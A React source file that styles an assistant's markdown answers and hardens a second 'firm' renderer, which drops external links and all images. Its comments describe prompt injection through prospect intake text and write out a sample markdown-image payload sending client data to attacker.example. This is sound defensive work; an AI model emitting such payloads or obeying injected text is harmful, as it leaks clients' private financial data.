import { Link } from 'react-router-dom';
import { inAppPath } from '../lib/inAppPath';

/**
 * Markdown component overrides matching the chat bubble's typography. Shared by every
 * surface that renders an assistant answer, so a bubble reads the same on the full `/ask`
 * page and in the side panel (docs/24).
 */
export const markdownComponents = {
  p:  (props: React.ComponentPropsWithoutRef<'p'>) => <p className="mb-2 last:mb-0" {...props} />,
  ul: (props: React.ComponentPropsWithoutRef<'ul'>) => <ul className="mb-2 list-disc space-y-1 pl-5 last:mb-0" {...props} />,
  ol: (props: React.ComponentPropsWithoutRef<'ol'>) => <ol className="mb-2 list-decimal space-y-1 pl-5 last:mb-0" {...props} />,
  li: (props: React.ComponentPropsWithoutRef<'li'>) => <li className="leading-relaxed" {...props} />,
  a:  ({ href, ...props }: React.ComponentPropsWithoutRef<'a'>) => {
    // In-app routes the assistant emits (e.g. "/settings/connections") navigate
    // client-side via the router so the user lands there without a full reload;
    // external URLs (privacy policy, etc.) still open in a new tab. `inAppPath` is the
    // shared in-app test (#1003): `//host` and `/\host` start with a slash but are
    // cross-origin, so they take the external branch below, with its target and rel.
    const path = inAppPath(href);
    if (path) {
      return <Link to={path} className="text-bronze-text underline underline-offset-2" {...props} />;
    }
    return <a href={href} className="text-bronze-text underline underline-offset-2" target="_blank" rel="noopener noreferrer" {...props} />;
  },
  strong: (props: React.ComponentPropsWithoutRef<'strong'>) => <strong className="font-semibold" {...props} />,
  code: (props: React.ComponentPropsWithoutRef<'code'>) => (
    <code className="rounded-[4px] bg-navy/8 px-1 py-0.5 font-mono text-[12px]" {...props} />
  ),
  pre: (props: React.ComponentPropsWithoutRef<'pre'>) => (
    <pre className="mb-2 overflow-x-auto rounded-token bg-navy/8 p-3 font-mono text-[12px] last:mb-0" {...props} />
  ),
  h1: (props: React.ComponentPropsWithoutRef<'h1'>) => <p className="mb-1 font-semibold" {...props} />,
  h2: (props: React.ComponentPropsWithoutRef<'h2'>) => <p className="mb-1 font-semibold" {...props} />,
  h3: (props: React.ComponentPropsWithoutRef<'h3'>) => <p className="mb-1 font-semibold" {...props} />,

  // GFM tables. `remarkGfm` has always been enabled, so "what are my holdings" comes back
  // as a table — but there was no override here until docs/24, which meant a bare unstyled
  // <table> with nothing to stop it forcing its own width. That mostly survived on the page
  // at max-w-5xl; it does not survive in a ~310px panel bubble. The wrapper is the load-
  // bearing part: the table scrolls inside its own box rather than widening its container.
  table: (props: React.ComponentPropsWithoutRef<'table'>) => (
    <div className="mb-2 max-w-full overflow-x-auto last:mb-0">
      <table className="w-max min-w-full border-collapse text-[12px]" {...props} />
    </div>
  ),
  thead: (props: React.ComponentPropsWithoutRef<'thead'>) => (
    <thead className="border-b border-line-strong text-left" {...props} />
  ),
  th: (props: React.ComponentPropsWithoutRef<'th'>) => (
    <th className="whitespace-nowrap px-2 py-1.5 font-semibold" {...props} />
  ),
  td: (props: React.ComponentPropsWithoutRef<'td'>) => (
    <td className="border-t border-line px-2 py-1.5 align-top" {...props} />
  ),
};

/**
 * The same overrides for an answer from the FIRM assistant (steward-app#1815), with one
 * difference: only an in-app path stays a link. Anything else (an external URL, `//host`,
 * `/\host`, a `mailto:`) renders as its plain text, with no href at all.
 *
 * Why the firm answer is held to more than the household one: a prospect types free text
 * into the intake form, and that text reaches this assistant's context. So an answer can
 * be steered by someone outside the firm, and a clickable external link is the most useful
 * thing an injected answer can carry. A path inside the app can only go somewhere the
 * reader could already go. The test is `inAppPath`, the rule `safeReturnTo` uses (#1003),
 * and the link goes to the path it CHECKED (tabs and newlines stripped), not the raw href.
 *
 * Images get the same treatment for the same reason, more strongly (see `img` below).
 * Raw HTML in an answer is not rendered as elements at all: `MessageList` runs
 * react-markdown with no `rehype-raw`, so an `<img>` or `<iframe>` typed into the text is
 * dropped, in both renderers (pinned in `MessageList.test.tsx`).
 *
 */
export const firmMarkdownComponents = {
  ...markdownComponents,
  a: ({ href, children }: React.ComponentPropsWithoutRef<'a'>) => {
    const path = inAppPath(href);
    if (path) return <Link to={path} className="text-bronze-text underline underline-offset-2">{children}</Link>;
    return <span>{children}</span>;
  },
  // No image, ever, whatever the src (same-origin included): an image loads with no click,
  // so an injected `![x](https://attacker.example/p?d=<client data>)` would send its URL the
  // moment the answer rendered. The SPA's CSP already blocks that off-origin load: `img-src`
  // is `'self' data: https://cdn.plaid.com`, ENFORCED in dev, stage and prod
  // (`deploy/lib/csp-mode.ts`, read 2026-09-25). This override is defence in depth, and it
  // does not depend on the CSP config: it also covers an environment `cspModeFor` does not
  // list (which falls back to report-only), and a same-origin image GET the CSP allows. A
  // firm answer has no legitimate use for an image, so it keeps only the alt text.
  img: ({ alt }: React.ComponentPropsWithoutRef<'img'>) => <span>{alt ?? ''}</span>,
};
